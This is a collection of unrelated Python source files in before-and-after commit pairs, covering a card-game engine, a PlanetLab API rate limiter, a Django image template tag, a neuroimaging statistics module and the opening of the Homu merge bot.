return super().isValidTarget(card)
@property
def slots(self):
# TODO enchantments
ret = []
if self.weapon:
assert self.type == self.TYPE_HERO
ret.append(self.weapon)
for aura in self.game.auras:
if aura.isValidTarget(self):
ret.append(aura)
return ret
def canAttack(self):
if self.atk == 0:
return False
if self.summoningSickness and not self.charge:
return False
return True
def attack(self, target):
logging.info("%r attacks %r" % (self, target))
target.damage(self.atk)
if self.weapon:
self.weapon.loseDurability()
if target.atk:
self.damage(target.atk)
def loseDurability(self, amount=1):
assert self.type == self.TYPE_WEAPON
assert self.durability
# XXX
self.durabilityCounter += 1
logging.info("%r loses %i durability (now at %i)" % (self, amount, self.durability))
if self.durability == 0:
self.destroy()
def gainArmor(self, amount):
assert self.type == self.TYPE_HERO
self.armor += amount
logging.info("%r gains %i armor (now at %i)" % (self, amount, self.armor))
def damage(self, amount):
if self.shield:
assert self.type is self.TYPE_MINION
self.shield = False
logging.info("%r's divine shield prevents %i damage. Divine shield fades." % (self, amount))
return
if self.armor:
newAmount = max(0, amount - self.armor)
self.armor -= min(self.armor, amount)
logging.info("%r reduces damage taken by %i through armor. %i armor remaining" % (self, amount - newAmount, self.armor))
amount = newAmount
self.damageCounter += min(self.health, amount)
logging.info("%r damaged for %i health (now at %i health)" % (self, amount, self.health))
# this should happen elsewhere
if self.health == 0:
self.destroy()
def heal(self, amount):
self.damageCounter -= min(amount, self.damageCounter)
logging.info("%r healed for %i health (now at %i health)" % (self, amount, self.health))
def equip(self, weapon):
logging.info("%r equips %r" % (self, weapon))
if self.weapon:
self.weapon.destroy()
self.weapon = weapon
def destroy(self):
logging.info("%r dies" % (self))
self.status = self.STATUS_GRAVEYARD
if self.type == self.TYPE_MINION:
self.owner.field.remove(self)
# Remove any aura the minion gives
if self.hasAura:
logging.info("Aura %r fades" % (self.aura))
self.game.auras.remove(self.aura)
elif self.type == self.TYPE_WEAPON:
# HACK
self.owner.hero.weapon = None
elif self.type == self.TYPE_HERO:
raise GameOver("%s wins!" % (self.owner.opponent))
elif self.type == self.TYPE_ENCHANTMENT:
self.owner.slots.remove(self)
else:
raise NotImplementedError(self.type)
def discard(self):
logging.info("Discarding %r" % (self))
self.status = self.STATUS_DISCARD
self.owner.hand.remove(self)
def isPlayable(self):
if self.owner.mana < self.cost:
return False
if len(self.targets) < self.minTargets:
return False
if self.type == self.TYPE_MINION:
if len(self.owner.field) >= self.game.MAX_MINIONS_ON_FIELD:
return False
return True
def play(self, target=None):
logging.info("%s plays %r" % (self.owner, self))
assert self.owner, "That minion is not mine!"
assert self.isPlayable(), "Not enough mana!"
self.owner.availableMana -= self.cost
self.status = self.STATUS_FIELD
if self.type is self.TYPE_MINION:
self.owner.summon(self)
self.summoningSickness = True
if self.hasAura:
self.aura = Card(self.aura)
self.aura.owner = self.owner
logging.info("Aura %r suddenly appears" % (self.aura))
self.game.auras.append(self.aura)
elif self.type in (self.TYPE_SPELL, self.TYPE_HERO_POWER):
if not hasattr(self, "activate"):
raise NotImplementedError(self)
elif self.type == self.TYPE_WEAPON:
self.owner.hero.equip(self)
elif self.type == self.TYPE_HERO:
assert isinstance(self.power, str)
self.owner.hero = self
self.power = Card(self.power)
self.power.owner = self.owner
assert self.power.type is self.TYPE_HERO_POWER, self.power.type
else:
raise NotImplementedError(self.name, self.type)
# Card must already be on the field for activate
if self.type not in (self.TYPE_HERO, self.TYPE_HERO_POWER):
self.owner.hand.remove(self)
if hasattr(self, "activate"):
logging.info("Triggering 'activate' for %r" % (self))
if self.hasTarget():
self.activate(target=target)
else:
self.activate()
def Card(id):
data = getattr(carddata, id, object)
datadict = {
"targeting": getattr(data, "targeting", TARGET_NONE),
"minTargets": getattr(data, "minTargets", 0),
}
cardcls = type(id, (_Card, data), datadict)
return cardcls(id)
def cardsForHero(hero):
return ['CS1_042', 'CS2_118', 'CS2_119', 'CS2_120', 'CS2_121', 'CS2_124', 'CS2_125', 'CS2_127', 'CS2_131', 'CS2_142', 'CS2_147', 'CS2_155', 'CS2_162', 'CS2_168', 'CS2_171', 'CS2_172', 'CS2_173', 'CS2_179', 'CS2_182', 'CS2_186', 'CS2_187', 'CS2_189', 'CS2_197', 'CS2_200', 'CS2_201', 'CS2_213', 'EX1_015', 'EX1_506', 'EX1_582']
class BaseCard(object):
pass
class Minion(BaseCard):
pass
class Spell(BaseCard):
pass
class Weapon(BaseCard):
pass
class Hero(BaseCard):
pass
class HeroPower(BaseCard):
pass
Simplify XMLCard even further
import json
import logging
import os
import uuid
from xml.etree import ElementTree
from .entity import Entity
from .exceptions import *
from .targeting import *
from . import carddata
_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), os.path.pardir, "data", "TextAsset")
THE_COIN = "GAME_005"
class XMLCard(object):
_tags = {
"type": "CardType",
"health": "Health",
"durability": "Durability",
"atk": "Atk",
"cost": "Cost",
"race": "Race",
"charge": "Charge",
"taunt": "Taunt",
"divineShield": "Divine Shield",
"oneTurnEffect": "OneTurnEffect",
"hasAura": "Aura",
}
def __init__(self, id):
self.file = os.path.join(_path, "%s.xml" % (id))
self.xml = ElementTree.parse(self.file)
def __getattr__(self, name):
par = super()
print("__getattr__", repr(self), repr(name), repr(par))
if hasattr(par, name):
print("path 1", getattr(par, name))
return getattr(par, name)
if name in self._tags:
print("path 2", self.getTag(self._tags[name]))
return self.getTag(self._tags[name])
return getattr(par, name)
def getTag(self, name):
tag = self.xml.findall('./Tag[@name="%s"]' % (name))
if not tag:
return 0
tag = tag[0]
value, type = tag.attrib["value"], tag.attrib["type"]
if type == "Bool":
return bool(int(value))
return int(value)
@property
def name(self):
return self.xml.findall("./Tag[@name='CardName']/enUS")[0].text
class _Card(Entity, XMLCard):
STATUS_DECK = 1
STATUS_HAND = 2
STATUS_FIELD = 3
STATUS_GRAVEYARD = 4
STATUS_DISCARD = 5
TYPE_HERO = 3
TYPE_MINION = 4
TYPE_SPELL = 5
TYPE_ENCHANTMENT = 6
TYPE_WEAPON = 7
TYPE_HERO_POWER = 10
def __init__(self, id):
self.id = id
self.uuid = uuid.uuid4()
self.owner = None
self.status = self.STATUS_DECK
self.damageCounter = 0
self.durabilityCounter = 0
self.summoningSickness = False
self.weapon = None
self.armor = 0
super().__init__(id)
self.shield = self.divineShield
def __str__(self):
return self.name
def __repr__(self):
return "<%s (%r)>" % (self.__class__.__name__, self.name)
@property
def game(self):
return self.owner.game
##
# Properties affected by slots
@property
def health(self):
damage = self.damageCounter
health = self.getProperty("health")
return max(0, health - damage)
@property
def atk(self):
return self.getProperty("atk")
@property
def durability(self):
return self.getProperty("durability")
@property
def targets(self):
return self.getTargets(self.targeting)
def getTargets(self, t):
ret = []
if t & TARGET_FRIENDLY:
if t & TARGET_HERO:
ret.append(self.owner.hero)
if t & TARGET_MULTIPLE:
if t & TARGET_MINION:
ret += self.owner.field
if t & TARGET_ENEMY:
if t & TARGET_HERO:
ret.append(self.owner.opponent.hero)
if t & TARGET_MULTIPLE:
if t & TARGET_MINION:
ret += self.owner.opponent.field
return ret
def hasTarget(self):
return self.targeting and (not self.targeting & TARGET_MULTIPLE)
def isValidTarget(self, card):
if card not in self.targets:
return False
return super().isValidTarget(card)
@property
def slots(self):
# TODO enchantments
ret = []
if self.weapon:
assert self.type == self.TYPE_HERO
ret.append(self.weapon)
for aura in self.game.auras:
if aura.isValidTarget(self):
ret.append(aura)
return ret
def canAttack(self):
if self.atk == 0:
return False
if self.summoningSickness and not self.charge:
return False
return True
def attack(self, target):
logging.info("%r attacks %r" % (self, target))
target.damage(self.atk)
if self.weapon:
self.weapon.loseDurability()
if target.atk:
self.damage(target.atk)
def loseDurability(self, amount=1):
assert self.type == self.TYPE_WEAPON
assert self.durability
# XXX
self.durabilityCounter += 1
logging.info("%r loses %i durability (now at %i)" % (self, amount, self.durability))
if self.durability == 0:
self.destroy()
def gainArmor(self, amount):
assert self.type == self.TYPE_HERO
self.armor += amount
logging.info("%r gains %i armor (now at %i)" % (self, amount, self.armor))
def damage(self, amount):
if self.shield:
assert self.type is self.TYPE_MINION
self.shield = False
logging.info("%r's divine shield prevents %i damage. Divine shield fades." % (self, amount))
return
if self.armor:
newAmount = max(0, amount - self.armor)
self.armor -= min(self.armor, amount)
logging.info("%r reduces damage taken by %i through armor. %i armor remaining" % (self, amount - newAmount, self.armor))
amount = newAmount
self.damageCounter += min(self.health, amount)
logging.info("%r damaged for %i health (now at %i health)" % (self, amount, self.health))
# this should happen elsewhere
if self.health == 0:
self.destroy()
def heal(self, amount):
self.damageCounter -= min(amount, self.damageCounter)
logging.info("%r healed for %i health (now at %i health)" % (self, amount, self.health))
def equip(self, weapon):
logging.info("%r equips %r" % (self, weapon))
if self.weapon:
self.weapon.destroy()
self.weapon = weapon
def destroy(self):
logging.info("%r dies" % (self))
self.status = self.STATUS_GRAVEYARD
if self.type == self.TYPE_MINION:
self.owner.field.remove(self)
# Remove any aura the minion gives
if self.hasAura:
logging.info("Aura %r fades" % (self.aura))
self.game.auras.remove(self.aura)
elif self.type == self.TYPE_WEAPON:
# HACK
self.owner.hero.weapon = None
elif self.type == self.TYPE_HERO:
raise GameOver("%s wins!" % (self.owner.opponent))
elif self.type == self.TYPE_ENCHANTMENT:
self.owner.slots.remove(self)
else:
raise NotImplementedError(self.type)
def discard(self):
logging.info("Discarding %r" % (self))
self.status = self.STATUS_DISCARD
self.owner.hand.remove(self)
def isPlayable(self):
if self.owner.mana < self.cost:
return False
if len(self.targets) < self.minTargets:
return False
if self.type == self.TYPE_MINION:
if len(self.owner.field) >= self.game.MAX_MINIONS_ON_FIELD:
return False
return True
def play(self, target=None):
logging.info("%s plays %r" % (self.owner, self))
assert self.owner, "That minion is not mine!"
assert self.isPlayable(), "Not enough mana!"
self.owner.availableMana -= self.cost
self.status = self.STATUS_FIELD
if self.type is self.TYPE_MINION:
self.owner.summon(self)
self.summoningSickness = True
if self.hasAura:
self.aura = Card(self.aura)
self.aura.owner = self.owner
logging.info("Aura %r suddenly appears" % (self.aura))
self.game.auras.append(self.aura)
elif self.type in (self.TYPE_SPELL, self.TYPE_HERO_POWER):
if not hasattr(self, "activate"):
raise NotImplementedError(self)
elif self.type == self.TYPE_WEAPON:
self.owner.hero.equip(self)
elif self.type == self.TYPE_HERO:
assert isinstance(self.power, str)
self.owner.hero = self
self.power = Card(self.power)
self.power.owner = self.owner
assert self.power.type is self.TYPE_HERO_POWER, self.power.type
else:
raise NotImplementedError(self.name, self.type)
# Card must already be on the field for activate
if self.type not in (self.TYPE_HERO, self.TYPE_HERO_POWER):
self.owner.hand.remove(self)
if hasattr(self, "activate"):
logging.info("Triggering 'activate' for %r" % (self))
if self.hasTarget():
self.activate(target=target)
else:
self.activate()
def Card(id):
data = getattr(carddata, id, object)
datadict = {
"targeting": getattr(data, "targeting", TARGET_NONE),
"minTargets": getattr(data, "minTargets", 0),
}
cardcls = type(id, (_Card, data), datadict)
return cardcls(id)
def cardsForHero(hero):
return ['CS1_042', 'CS2_118', 'CS2_119', 'CS2_120', 'CS2_121', 'CS2_124', 'CS2_125', 'CS2_127', 'CS2_131', 'CS2_142', 'CS2_147', 'CS2_155', 'CS2_162', 'CS2_168', 'CS2_171', 'CS2_172', 'CS2_173', 'CS2_179', 'CS2_182', 'CS2_186', 'CS2_187', 'CS2_189', 'CS2_197', 'CS2_200', 'CS2_201', 'CS2_213', 'EX1_015', 'EX1_506', 'EX1_582']
class BaseCard(object):
pass
class Minion(BaseCard):
pass
class Spell(BaseCard):
pass
class Weapon(BaseCard):
pass
class Hero(BaseCard):
pass
class HeroPower(BaseCard):
pass
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
#
# S.Çağlar Onur <caglar@cs.princeton.edu>
from PLC.Config import Config
from PLC.Faults import PLCPermissionDenied
from datetime import datetime, timedelta
from pyaspects.meta import MetaAspect
import memcache
class BaseRateLimit(object):
def __init__(self):
self.config = Config("/etc/planetlab/plc_config")
# FIXME: change with Config values
self.prefix = "ratelimit"
self.minutes = 5 # The time period
self.requests = 50 # Number of allowed requests in that time period
self.expire_after = (self.minutes + 1) * 60
self.whitelist = []
def before(self, wobj, data, *args, **kwargs):
# ratelimit_128.112.139.115_201011091532 = 1
# ratelimit_128.112.139.115_201011091533 = 14
# ratelimit_128.112.139.115_201011091534 = 11
# Now, on every request we work out the keys for the past five minutes and use get_multi to retrieve them.
# If the sum of those counters exceeds the maximum allowed for that time period, we block the request.
api_method_name = wobj.name
api_method_source = wobj.source
if api_method_source == None or api_method_source[0] == self.config.PLC_API_IP or api_method_source[0] in self.whitelist:
return
mc = memcache.Client(["%s:11211" % self.config.PLC_API_HOST])
now = datetime.now()
current_key = "%s_%s_%s" % (self.prefix, api_method_source[0], now.strftime("%Y%m%d%H%M"))
keys_to_check = ["%s_%s_%s" % (self.prefix, api_method_source[0], (now - timedelta(minutes = minute)).strftime("%Y%m%d%H%M")) for minute in range(self.minutes + 1)]
try:
value = mc.incr(current_key)
except ValueError:
value = None
if value == None:
mc.set(current_key, 1, time=self.expire_after)
result = mc.get_multi(keys_to_check)
total_requests = 0
for i in result:
total_requests += result[i]
if total_requests > self.requests:
log = open("/var/log/plc_api_ratelimit.log", "a")
date = datetime.now().strftime("%d/%m/%y %H:%M")
log.write("%s - %s\n" % (date, api_method_source[0]))
log.flush()
raise PLCPermissionDenied, "Maximum allowed number of API calls exceeded"
def after(self, wobj, data, *args, **kwargs):
return
class RateLimitAspect_class(BaseRateLimit):
__metaclass__ = MetaAspect
name = "ratelimitaspect_class"
def __init__(self):
BaseRateLimit.__init__(self)
def before(self, wobj, data, *args, **kwargs):
BaseRateLimit.before(self, wobj, data, *args, **kwargs)
def after(self, wobj, data, *args, **kwargs):
BaseRateLimit.after(self, wobj, data, *args, **kwargs)
RateLimitAspect = RateLimitAspect_class
use Username while calculating the key
#!/usr/bin/python
#-*- coding: utf-8 -*-
#
# S.Çağlar Onur <caglar@cs.princeton.edu>
from PLC.Config import Config
from PLC.Faults import PLCPermissionDenied
from datetime import datetime, timedelta
from pyaspects.meta import MetaAspect
import memcache
class BaseRateLimit(object):
def __init__(self):
self.config = Config("/etc/planetlab/plc_config")
# FIXME: change with Config values
self.prefix = "ratelimit"
self.minutes = 5 # The time period
self.requests = 50 # Number of allowed requests in that time period
self.expire_after = (self.minutes + 1) * 60
self.whitelist = []
def log(self, line)
log = open("/var/log/plc_ratelimit.log", "a")
date = datetime.now().strftime("%d/%m/%y %H:%M")
log.write("%s - %s\n" % (date, line))
log.flush()
def before(self, wobj, data, *args, **kwargs):
# ratelimit_128.112.139.115_201011091532 = 1
# ratelimit_128.112.139.115_201011091533 = 14
# ratelimit_128.112.139.115_201011091534 = 11
# Now, on every request we work out the keys for the past five minutes and use get_multi to retrieve them.
# If the sum of those counters exceeds the maximum allowed for that time period, we block the request.
api_method_name = wobj.name
api_method_source = wobj.source
api_method_caller = args[0]["Username"]
if api_method_source == None or api_method_source[0] == self.config.PLC_API_IP or api_method_source[0] in self.whitelist:
return
if api_method_caller == None:
self.log("%s called with Username = None" % api_method_source[0])
return
mc = memcache.Client(["%s:11211" % self.config.PLC_API_HOST])
now = datetime.now()
current_key = "%s_%s_%s" % (self.prefix, api_method_source[0], now.strftime("%Y%m%d%H%M"))
keys_to_check = ["%s_%s_%s" % (self.prefix, api_method_source[0], (now - timedelta(minutes = minute)).strftime("%Y%m%d%H%M")) for minute in range(self.minutes + 1)]
try:
value = mc.incr(current_key)
except ValueError:
value = None
if value == None:
mc.set(current_key, 1, time=self.expire_after)
result = mc.get_multi(keys_to_check)
total_requests = 0
for i in result:
total_requests += result[i]
if total_requests > self.requests:
self.log("%s - %s" % (api_method_source[0], api_method_caller))
raise PLCPermissionDenied, "Maximum allowed number of API calls exceeded"
def after(self, wobj, data, *args, **kwargs):
return
class RateLimitAspect_class(BaseRateLimit):
__metaclass__ = MetaAspect
name = "ratelimitaspect_class"
def __init__(self):
BaseRateLimit.__init__(self)
def before(self, wobj, data, *args, **kwargs):
BaseRateLimit.before(self, wobj, data, *args, **kwargs)
def after(self, wobj, data, *args, **kwargs):
BaseRateLimit.after(self, wobj, data, *args, **kwargs)
RateLimitAspect = RateLimitAspect_class
|
from __future__ import absolute_import
from django import template
from django.conf import settings
from django.template.defaulttags import kwarg_re
from daguerre.utils.adjustments import get_adjustment_class, DEFAULT_ADJUSTMENT
from daguerre.views import get_image_resize_info
register = template.Library()
class ImageResizeNode(template.Node):
def __init__(self, image, kwargs=None, asvar=None):
self.image = image
self.kwargs = kwargs
self.asvar = asvar
def render(self, context):
image = self.image.resolve(context)
kwargs = dict((k, v.resolve(context)) for k, v in self.kwargs.iteritems())
adjustment_class = get_adjustment_class(kwargs.pop('adjustment', DEFAULT_ADJUSTMENT))
adjustment = adjustment_class.from_image(image, **kwargs)
if self.asvar is not None:
context[self.asvar] = adjustment.info_dict()
return ''
return adjustment.url
@register.tag
def resize(parser, token):
"""
Returns an instance of :class:`ImageProxy`, which can calculate the appropriate url for the resized version of an image, as well as knowing the actual resized width and height for the given parameters.
Syntax::
{% resize <image> [key=val key=val ...] [as <varname>] %}
If only one of width/height is supplied, the proportions are automatically constrained.
Cropping and resizing will each only take place if the relevant variables are defined.
The optional keyword arguments must be among:
* width
* height
* max_width
* max_height
* adjustment
* crop
"""
params = token.split_contents()
if len(params) < 2:
raise template.TemplateSyntaxError('"%s" template tag requires at least two arguments' % tag)
tag = params[0]
image = parser.compile_filter(params[1])
params = params[2:]
asvar = None
if len(params) > 1:
if params[-2] == 'as':
asvar = params[-1]
params = params[:-2]
valid_kwargs = ('width', 'height', 'max_width', 'max_height', 'adjustment', 'crop')
kwargs = {}
for param in params:
match = kwarg_re.match(param)
if not match:
raise template.TemplateSyntaxError("Malformed arguments to `%s` tag" % tag)
name, value = match.groups()
if name not in valid_kwargs:
raise template.TemplateSyntaxError("Invalid argument to `%s` tag: %s" % (tag, name))
kwargs[str(name)] = parser.compile_filter(value)
return ImageResizeNode(image, kwargs=kwargs, asvar=asvar)
Renamed {% resize %} tag to {% adjust %} and clarified the docstring.
from __future__ import absolute_import
from django import template
from django.conf import settings
from django.template.defaulttags import kwarg_re
from daguerre.utils.adjustments import get_adjustment_class, DEFAULT_ADJUSTMENT
from daguerre.views import get_image_resize_info
register = template.Library()
class ImageResizeNode(template.Node):
def __init__(self, image, kwargs=None, asvar=None):
self.image = image
self.kwargs = kwargs
self.asvar = asvar
def render(self, context):
image = self.image.resolve(context)
kwargs = dict((k, v.resolve(context)) for k, v in self.kwargs.iteritems())
adjustment_class = get_adjustment_class(kwargs.pop('adjustment', DEFAULT_ADJUSTMENT))
adjustment = adjustment_class.from_image(image, **kwargs)
if self.asvar is not None:
context[self.asvar] = adjustment.info_dict()
return ''
return adjustment.url
@register.tag
def adjust(parser, token):
"""
Returns a url to the adjusted image, or (with ``as``) stores a variable in the context containing the results of :meth:`~Adjustment.info_dict`.
Syntax::
{% adjust <image> [key=val key=val ...] [as <varname>] %}
If only one of width/height is supplied, the proportions are automatically constrained.
Cropping and resizing will each only take place if the relevant variables are defined.
The optional keyword arguments must be among:
* width
* height
* max_width
* max_height
* adjustment
* crop
"""
params = token.split_contents()
if len(params) < 2:
raise template.TemplateSyntaxError('"%s" template tag requires at least two arguments' % tag)
tag = params[0]
image = parser.compile_filter(params[1])
params = params[2:]
asvar = None
if len(params) > 1:
if params[-2] == 'as':
asvar = params[-1]
params = params[:-2]
valid_kwargs = ('width', 'height', 'max_width', 'max_height', 'adjustment', 'crop')
kwargs = {}
for param in params:
match = kwarg_re.match(param)
if not match:
raise template.TemplateSyntaxError("Malformed arguments to `%s` tag" % tag)
name, value = match.groups()
if name not in valid_kwargs:
raise template.TemplateSyntaxError("Invalid argument to `%s` tag: %s" % (tag, name))
kwargs[str(name)] = parser.compile_filter(value)
return ImageResizeNode(image, kwargs=kwargs, asvar=asvar) |
import gc
import numpy as N
from scipy.sandbox.models.utils import recipr
from neuroimaging import traits
class OneSampleResults(object):
"""
A container for results from fitting a (weighted) one sample T.
"""
def __init__(self):
self.values = {'mean': {'mu': None,
'sd': None,
't': None,
'resid': None,
'df_resid': None,
'scale': None},
'varatio': {'varatio': None,
'varfix': None}}
def __getitem__(self, key):
return self.values[key]
def __setitem__(self, key, val):
self.values[key] = val
class OneSample(traits.HasTraits):
weight_type = traits.Trait('sd', 'var', 'weight')
varatio = traits.Trait(traits.Any())
varfix = traits.Trait(traits.Any())
niter = traits.Int(10)
use_scale = traits.true
def __init__(self, **keywords):
traits.HasTraits.__init__(self, **keywords)
def estimate_varatio(self, Y, W, df=None):
Sreduction = 0.99
S = 1. / W
nsubject = Y.shape[0]
df_resid = nsubject - 1
R = Y - N.multiply.outer(N.ones(Y.shape[0]), N.mean(Y, axis=0))
sigma2 = N.squeeze(N.add.reduce(N.power(R, 2), axis=0) / df_resid)
minS = N.minimum.reduce(S, 0) * Sreduction
Sm = S - N.multiply.outer(N.ones((nsubject,), N.float64), minS)
for _ in range(self.niter):
Sms = Sm + N.multiply.outer(N.ones((nsubject,), N.float64), sigma2)
W = recipr(Sms)
Winv = 1. / N.add.reduce(W, axis=0)
mu = Winv * N.add.reduce(W * Y, axis=0)
R = W * (Y - N.multiply.outer(N.ones(nsubject), mu))
ptrS = 1 + N.add.reduce(Sm * W, 0) - \
N.add.reduce(Sm * N.power(W, 2), axis=0) * Winv
sigma2 = N.squeeze((sigma2 * ptrS + N.power(sigma2, 2) *
N.add.reduce(N.power(R,2), 0)) / nsubject)
sigma2 = sigma2 - minS
if df is None:
df = N.ones((nsubject,), N.float64)
df.shape = (1, nsubject)
_Sshape = S.shape
S.shape = (S.shape[0], N.product(S.shape[1:]))
value = OneSampleResults()
value['varatio']['varfix'] = N.dot(df, S) / df.sum()
S.shape = _Sshape
value['varatio']['varfix'].shape = _Sshape[1:]
value['varatio']['varatio'] = N.nan_to_num(sigma2 / value.varfix)
return value
def fit(self, Y, W, which='mean', df=None):
if which == 'mean':
return self.estimate_mean(Y, W)
else:
return self.estimate_varatio(Y, W, df=df)
def get_weights(self, W):
try:
if W.ndim == 1:
W.shape = (W.shape[0], 1)
except:
pass
if self.weight_type == 'sd':
W = 1. / N.power(W, 2)
elif self.weight_type == 'var':
W = 1. / W
return N.asarray(W)
def estimate_mean(self, Y, W):
if Y.ndim == 1:
Y.shape = (Y.shape[0], 1)
W = self.get_weights(W)
if W.shape in [(),(1,)]:
W = N.ones(Y.shape) * W
nsubject = Y.shape[0]
if self.varfix is not None:
sigma2 = N.asarray(self.varfix * self.varatio)
if sigma2.shape != ():
sigma2 = N.multiply.outer(N.ones((nsubject,), N.float64), sigma2)
S = recipr(W) + sigma2
W = recipr(S)
mu = N.add.reduce(Y * W, 0) / N.add.reduce(W, 0)
value = OneSampleResults()
value['mean']['df_resid'] = Y.shape[0] - 1
value['mean']['resid'] = (Y - N.multiply.outer(N.ones(Y.shape[0], N.float64), mu)) * N.sqrt(W)
if self.use_scale:
scale = N.add.reduce(N.power(value['mean']['resid'], 2), 0) / value['mean']['df_resid']
else:
scale = 1.
var_total = scale * recipr(N.add.reduce(W, 0))
value['mean']['mu'] = mu
value['mean']['sd'] = N.squeeze(N.sqrt(var_total))
value['mean']['t'] = N.squeeze(value['mean']['mu'] * recipr(value['mean']['sd']))
value['mean']['scale'] = N.sqrt(scale)
return value
class OneSampleIterator(object):
def __init__(self, iterator, outputs=[]):
self.iterator = iter(iterator)
self.outputs = [iter(output) for output in outputs]
def weights(self):
"""
This method should get the weights from self.iterator.
"""
return 1.
def fit(self, **keywords):
"""
Go through an iterator, instantiating model and passing data,
going through outputs.
"""
for data in self.iterator:
W = self.weights()
shape = data.shape[1:]
os = OneSample()
#results = OneSample.fit(self, data, W, **keywords)
results = os.fit(data, W, **keywords)
for output in self.outputs:
out = output.extract(results)
if output.nout > 1:
out.shape = (output.nout,) + shape
else:
out.shape = shape
output.next(data=out)
del(results);
gc.collect()
clean up
import gc
import numpy as N
from scipy.sandbox.models.utils import recipr
from neuroimaging import traits
class OneSampleResults(object):
"""
A container for results from fitting a (weighted) one sample T.
"""
def __init__(self):
self.values = {'mean': {'mu': None,
'sd': None,
't': None,
'resid': None,
'df_resid': None,
'scale': None},
'varatio': {'varatio': None,
'varfix': None}}
def __getitem__(self, key):
return self.values[key]
def __setitem__(self, key, val):
self.values[key] = val
class OneSample(traits.HasTraits):
weight_type = traits.Trait('sd', 'var', 'weight')
varatio = traits.Trait(traits.Any())
varfix = traits.Trait(traits.Any())
niter = traits.Int(10)
use_scale = traits.true
def __init__(self, **keywords):
traits.HasTraits.__init__(self, **keywords)
def estimate_varatio(self, Y, W, df=None):
Sreduction = 0.99
S = 1. / W
nsubject = Y.shape[0]
df_resid = nsubject - 1
R = Y - N.multiply.outer(N.ones(Y.shape[0]), N.mean(Y, axis=0))
sigma2 = N.squeeze(N.add.reduce(N.power(R, 2), axis=0) / df_resid)
minS = N.minimum.reduce(S, 0) * Sreduction
Sm = S - N.multiply.outer(N.ones((nsubject,), N.float64), minS)
for _ in range(self.niter):
Sms = Sm + N.multiply.outer(N.ones((nsubject,), N.float64), sigma2)
W = recipr(Sms)
Winv = 1. / N.add.reduce(W, axis=0)
mu = Winv * N.add.reduce(W * Y, axis=0)
R = W * (Y - N.multiply.outer(N.ones(nsubject), mu))
ptrS = 1 + N.add.reduce(Sm * W, 0) - \
N.add.reduce(Sm * N.power(W, 2), axis=0) * Winv
sigma2 = N.squeeze((sigma2 * ptrS + N.power(sigma2, 2) *
N.add.reduce(N.power(R,2), 0)) / nsubject)
sigma2 = sigma2 - minS
if df is None:
df = N.ones((nsubject,), N.float64)
df.shape = (1, nsubject)
_Sshape = S.shape
S.shape = (S.shape[0], N.product(S.shape[1:]))
value = OneSampleResults()
value['varatio']['varfix'] = N.dot(df, S) / df.sum()
S.shape = _Sshape
value['varatio']['varfix'].shape = _Sshape[1:]
value['varatio']['varatio'] = N.nan_to_num(sigma2 / value.varfix)
return value
def fit(self, Y, W, which='mean', df=None):
if which == 'mean':
return self.estimate_mean(Y, W)
else:
return self.estimate_varatio(Y, W, df=df)
def get_weights(self, W):
try:
if W.ndim == 1:
W.shape = (W.shape[0], 1)
except:
pass
if self.weight_type == 'sd':
W = 1. / N.power(W, 2)
elif self.weight_type == 'var':
W = 1. / W
return N.asarray(W)
def estimate_mean(self, Y, W):
if Y.ndim == 1:
Y.shape = (Y.shape[0], 1)
W = self.get_weights(W)
if W.shape in [(),(1,)]:
W = N.ones(Y.shape) * W
nsubject = Y.shape[0]
if self.varfix is not None:
sigma2 = N.asarray(self.varfix * self.varatio)
if sigma2.shape != ():
sigma2 = N.multiply.outer(N.ones((nsubject,), N.float64), sigma2)
S = recipr(W) + sigma2
W = recipr(S)
mu = N.add.reduce(Y * W, 0) / N.add.reduce(W, 0)
value = OneSampleResults()
value['mean']['df_resid'] = Y.shape[0] - 1
value['mean']['resid'] = (Y - N.multiply.outer(N.ones(Y.shape[0], N.float64), mu)) * N.sqrt(W)
if self.use_scale:
scale = N.add.reduce(N.power(value['mean']['resid'], 2), 0) / value['mean']['df_resid']
else:
scale = 1.
var_total = scale * recipr(N.add.reduce(W, 0))
value['mean']['mu'] = mu
value['mean']['sd'] = N.squeeze(N.sqrt(var_total))
value['mean']['t'] = N.squeeze(value['mean']['mu'] * recipr(value['mean']['sd']))
value['mean']['scale'] = N.sqrt(scale)
return value
class OneSampleIterator(object):
def __init__(self, iterator, outputs=[]):
self.iterator = iter(iterator)
self.outputs = [iter(output) for output in outputs]
def weights(self):
"""
This method should get the weights from self.iterator.
"""
return 1.
def fit(self, **keywords):
"""
Go through an iterator, instantiating model and passing data,
going through outputs.
"""
for data in self.iterator:
W = self.weights()
shape = data.shape[1:]
results = OneSample().fit(data, W, **keywords)
for output in self.outputs:
out = output.extract(results)
if output.nout > 1:
out.shape = (output.nout,) + shape
else:
out.shape = shape
output.next(data=out)
del(results);
gc.collect()
|
import argparse
from datetime import datetime, timezone
import github3
import os
import toml
import json
import re
from .database import Database
from . import utils
import logging
from threading import Thread, Lock
import time
import traceback
import requests
from contextlib import contextmanager
from functools import partial
from itertools import chain
from queue import Queue
import signal
STATUS_TO_PRIORITY = {
'success': 0,
'pending': 1,
'approved': 2,
'': 3,
'error': 4,
'failure': 5,
}
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
@contextmanager
def buildbot_sess(repo_cfg):
sess = requests.Session()
sess.post(repo_cfg['buildbot']['url'] + '/login', allow_redirects=False, data={
'username': repo_cfg['buildbot']['username'],
'passwd': repo_cfg['buildbot']['password'],
})
yield sess
sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
class PullReqState:
num = 0
priority = 0
rollup = False
title = ''
body = ''
head_ref = ''
base_ref = ''
assignee = ''
def __init__(self, num, head_sha, status, repo_label, mergeable_que, gh,
owner, name, repos):
self.head_advanced('', use_db=False)
self.num = num
self.head_sha = head_sha
self.status = status
self.repo_label = repo_label
self.mergeable_que = mergeable_que
self.gh = gh
self.owner = owner
self.name = name
self.repos = repos
self.db = Database()
def head_advanced(self, head_sha, *, use_db=True):
self.head_sha = head_sha
self.approved_by = ''
self.status = ''
self.merge_sha = ''
self.build_res = {}
self.try_ = False
self.mergeable = None
if use_db:
self.set_status('')
self.set_mergeable(None)
self.init_build_res([])
def __repr__(self):
return 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'.format(
self.owner,
self.name,
self.num,
self.approved_by,
self.priority,
self.status,
)
def sort_key(self):
return [
STATUS_TO_PRIORITY.get(self.get_status(), -1),
1 if self.mergeable is False else 0,
0 if self.approved_by else 1,
1 if self.rollup else 0,
-self.priority,
self.num,
]
